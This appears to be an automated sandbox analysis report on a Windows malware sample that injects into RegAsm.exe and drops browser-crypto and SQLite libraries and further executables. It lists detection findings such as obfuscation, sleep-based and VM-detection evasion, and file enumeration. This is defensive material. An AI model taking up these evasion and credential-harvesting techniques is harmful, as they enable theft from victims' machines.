Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2385875761.000000001DB7B000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: c:\rje\tg\obj\Re\ease\etf.pdb source: KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041616A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0041616A

PE file contains an invalid checksum

Source: KJKJJJECFI.exe.2.dr	Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: sql[1].dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: file.exe	Static PE information: real checksum: 0x2f063 should be: 0x3d94c
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: real checksum: 0x32c4e should be: 0x31538
Source: KKJEBAAECB.exe.2.dr	Static PE information: real checksum: 0x511fe should be: 0x5fee9
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: real checksum: 0x511fe should be: 0x5fee9

PE file contains sections with non-standard names

Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AA05 push ecx; ret	2_2_0041AA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FB536 push ecx; ret	2_2_6C0FB549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043504B push ss; retf	9_2_0043504F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAB3C51 push es; retf	12_2_1DAB3C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1DB66 push esp; retf	12_2_1DB1DB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1D561 push esp; retf	12_2_1DB1D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB2F456 push ebx; ret	12_2_1DB2F457

Source: file.exe	Static PE information: section name: .text entropy: 7.988086899463732
Source: KKJEBAAECB.exe.2.dr	Static PE information: section name: .text entropy: 7.99530141513891
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: section name: .text entropy: 7.99530141513891
Source: KJKJJJECFI.exe.2.dr	Static PE information: section name: .text entropy: 7.988564984813096
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: section name: .text entropy: 7.988564984813096

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KKJEBAAECB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd9a65b5d_vqwergf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66d0cd8fb6f7b_lgjfd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJKJJJECFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KKJEBAAECB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KJKJJJECFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0041616A

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Memory allocated: B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe TID: 5084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1272	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe TID: 5408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4080	Thread sleep count: 90 > 30	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	12_2_004013B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040EA64 GetSystemInfo,wsprintfA,

2_2_0040EA64

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
